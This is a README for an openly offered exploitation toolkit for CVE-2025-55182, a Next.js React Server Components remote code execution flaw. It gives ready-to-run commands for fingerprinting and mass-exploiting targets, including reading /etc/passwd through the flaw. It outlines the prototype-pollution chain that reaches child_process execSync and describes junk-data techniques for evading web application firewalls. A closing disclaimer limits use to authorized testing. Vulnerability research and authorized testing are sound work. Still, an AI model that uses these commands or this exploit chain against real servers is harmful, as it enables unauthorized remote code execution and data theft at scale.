Share
## https://sploitus.com/exploit?id=CEDEA686-C278-503E-8134-88080E9143D8
# CVE-2025-55182 Exploitation Tool

A comprehensive security research tool for testing Next.js React Server Components Remote Code Execution vulnerability (CVE-2025-55182).

## Overview

This toolkit provides automated detection and exploitation capabilities for CVE-2025-55182, a critical RCE vulnerability affecting Next.js applications using React Server Components. The toolkit consists of three integrated components:

- **NextApp.py** - Intelligent Next.js application fingerprinting scanner
- **exploit.sh** - Flexible exploitation tool for single or bulk targets
- **auto_exploit.sh** - End-to-end automated scanning and exploitation orchestrator

## Features

- **Multi-layered Detection**: Header analysis, body scanning, and JavaScript fingerprinting
- **Confidence Scoring**: Intelligent classification (High/Medium/Low) to minimize false positives
- **WAF Bypass**: Built-in techniques to evade common web application firewalls
- **Bulk Scanning**: Process multiple targets efficiently with detailed reporting
- **Automated Workflow**: One-command detection and exploitation
- **Detailed Reporting**: Comprehensive output files with categorized results

## Requirements

### Python Components
- Python 3.x
- `requests` library

```bash
pip3 install requests
```

### Bash Components
- curl
- openssl
- Standard Unix utilities (sed, grep, awk, mktemp)

## Installation

```bash
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh
```

## Usage

### Quick Start (Recommended)

The fastest way to scan and exploit targets:

```bash
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt

# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"
```

### Detection Only

Identify Next.js applications without exploitation:

```bash
python3 NextApp.py targets.txt
```

**Output files:**
- `confirmed_nextjs_targets.txt` - All detected Next.js applications
- `high_confidence_nextjs_targets.txt` - High-confidence detections only

### Single Target Exploitation

Test individual targets:

```bash
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"

# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k
```

### Bulk Exploitation

#### Option 1: Unified Workflow (Recommended)

```bash
./auto_exploit.sh -i targets.txt -s -c "whoami"
```

#### Option 2: Two-Step Manual Workflow

```bash
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt

# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"
```

### Advanced Options

```bash
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"
```

## Command Reference

### NextApp.py

```bash
python3 NextApp.py 
```

**Arguments:**
- `targets_file` - Text file containing target URLs (one per line)

### exploit.sh

```bash
./exploit.sh [OPTIONS]
```

**Options:**
| Option | Description | Default |
|--------|-------------|---------|
| `-d, --domain` | Target domain/URL | http://localhost:3000 |
| `-f, --file` | File with target list | - |
| `-c, --command` | Command to execute | id |
| `-w, --waf-bypass` | Enable WAF bypass | Disabled |
| `--waf-size SIZE` | WAF bypass data size (KB) | 128 |
| `--timeout SECONDS` | Request timeout | 15 |
| `-k, --insecure` | Skip SSL verification | Disabled |
| `--user-agent AGENT` | Custom User-Agent | Mozilla/5.0... |
| `-h, --help` | Show help message | - |

### auto_exploit.sh

```bash
./auto_exploit.sh [OPTIONS]
```

**Options:**
| Option | Description | Default |
|--------|-------------|---------|
| `-i, --input FILE` | Input targets file | confirmed_nextjs_targets.txt |
| `-o, --output FILE` | Output results file | exploit_results.txt |
| `-c, --command CMD` | Command to execute | id |
| `-w, --waf-bypass` | Enable WAF bypass | Disabled |
| `--waf-size SIZE` | WAF bypass size (KB) | 128 |
| `--timeout SECONDS` | Request timeout | 15 |
| `-k, --insecure` | Skip SSL verification | Disabled |
| `--delay SECONDS` | Delay between requests | 2 |
| `-s, --scan` | Auto-scan for Next.js first | Disabled |
| `-h, --help` | Show help message | - |

## Output Files

### confirmed_nextjs_targets.txt
Generated by `NextApp.py` - contains all URLs identified as Next.js applications.

### high_confidence_nextjs_targets.txt
Generated by `NextApp.py` - contains only high-confidence Next.js detections (100+ confidence score).

### exploit_results.txt
Generated by `auto_exploit.sh` - comprehensive exploitation report including:
- Vulnerable targets with command output
- Non-vulnerable targets
- Errors and their details
- Summary statistics

## Detection Methodology

The scanner uses multiple detection techniques with a confidence scoring system:

### Header Analysis (50 points each)
- Next.js specific headers: `x-nextjs-*`, `x-vercel-*`
- `x-powered-by: Next.js`
- Server: Vercel

### Body Scanning
- `__NEXT_DATA__` presence (100 points)
- Next.js buildId pattern (50 points)
- `_next/*` asset paths (25-75 points based on quantity)

### JavaScript Fingerprinting (60 points)
- `__NEXT_DATA__`, `__NEXT_LOADED_PAGES__`
- `middlewareManifest`, `self.__RSC_MANIFEST`

**Confidence Thresholds:**
- **High (100+)**: Multiple strong indicators
- **Medium (75-99)**: Several moderate indicators
- **Low (50-74)**: Minimal evidence
- **Below 50**: Rejected as false positive

## Exploitation Mechanism

The exploit leverages a prototype pollution chain in Next.js React Server Components:

1. Constructs multipart form data with nested payload
2. Pollutes `__proto__` chain via JSON deserialization
3. Injects arbitrary JavaScript into `_response._prefix`
4. Executes commands via `process.mainModule.require('child_process').execSync()`
5. Extracts results from `X-Action-Redirect` header
6. URL-decodes and formats output

## WAF Bypass Techniques

The toolkit includes built-in WAF bypass capabilities:

- **Junk Data Injection**: Prepends random data to bypass size-based filters
- **Dynamic Boundaries**: Randomized multipart boundaries
- **Request ID Randomization**: Unique IDs per request
- **Configurable Size**: Adjustable junk data size (default 128KB)

Enable with `-w` or `--waf-bypass` flags.

## Examples

### Scan and Exploit Web Application

```bash
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Check results
cat exploit_results.txt
```

### Test Single Target with WAF Bypass

```bash
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256
```

### High-Confidence Targets Only

```bash
# Step 1: Detect and filter
python3 NextApp.py targets.txt

# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"
```

## Legal Disclaimer

This tool is intended for authorized security testing and research purposes only. Users must:

- โœ… Obtain explicit written permission before testing any systems
- โœ… Use only in authorized penetration testing engagements
- โœ… Comply with all applicable laws and regulations
- โœ… Use for defensive security research and CTF competitions

**Unauthorized access to computer systems is illegal.** The authors assume no liability for misuse of this tool.

## Vulnerability Information

- **CVE ID**: CVE-2025-55182
- **Affected**: Next.js React Server Components
- **Type**: Remote Code Execution (RCE)
- **Severity**: Critical

## Credits

Thanks to the security researchers who discovered and disclosed this vulnerability:
- @zack0x01
- @infosec_au
- @pdiscoveryio

## Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch
3. Commit your changes
4. Submit a pull request

## Support

For issues, questions, or feature requests, please open an issue on GitHub.

## License

This project is provided for educational and authorized security testing purposes. Use responsibly and ethically.